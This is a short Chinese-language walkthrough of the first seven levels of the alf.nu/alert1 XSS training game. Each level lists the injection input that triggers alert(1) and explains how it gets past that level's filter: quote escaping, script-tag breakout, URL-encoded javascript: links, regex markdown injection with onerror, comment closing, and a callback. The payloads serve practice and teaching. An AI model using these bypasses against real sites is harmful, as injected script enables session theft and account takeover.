alf.nu/alert1 XSS 1-7

NO.1 Warmup

Input:
");alert(1)//

NO.2 Adobe

Input:
\");alert(1)//

本关对输入的双引号进行了转义，再加一个反斜杠转义回来即可

NO.3 JSON

Input:
</script><script>alert(1);//

本关使用JSON.stringify()进行过滤，反斜杠也被过滤掉，但可以用script标签进行分割

NO.4 JavaScript

Input:
%22);alert(1)//

---

javascript伪协议：

<a href="javascript:void(0)">Content</a>

当浏览器装载这样的URL时，它将执行这个URL中包含的Javascript代码，并把最后一条javascript语句的字符串值作为新文档的内容显示出来。这个字符串可以含有HTML标记，并被格式化，其显示与其他装载进浏览器的文档类型完全相同

因为最后传递到url中所以用url编码绕过

NO.5 Markdown

Input:
[[1|http://onerror='alert(1)']]

---

本题主要考察正则有关知识
先是过滤掉了小于号和双引号，然后
“[[1|http://onerror='alert(1)']]“.replace(/(http:\/\/\S+)/g, ‘$1‘);
结果为：
[[1|<a href="http://onerror='alert(1)']]">http://onerror='alert(1)']]</a>
然后
“[[1|<a href="http://onerror='alert(1)']]">http://onerror='alert(1)']]</a>“.text = text.replace(/[[(\w+)|(.+?)]]/g, ‘<img alt="$2" src="$1.gif">‘);
结果：<img alt="<a href="http://onerror='alert(1)'" src="1.gif">">http://onerror='alert(1)']]</a>

注意这里要用onerror而不是onload因为图片注定会加载失败

NO.6 DOM

Input:
Comment# --><script>alert(1)</script><!--

---

Function.apply(obj,args):

obj：这个对象将代替Function类里this对象
args：这个是数组，它将作为参数传给Function（args–>arguments）
apply方法能劫持另外一个对象的方法，继承另外一个对象的属性

先用document.createComment()创建注释，然后再绕过注释

NO.7 Callback

Input:
'#';alert(1);//

被单引号包围的双引号会被当成字符串处理，所以在这里前后都使用单引号，绕过双引号的限制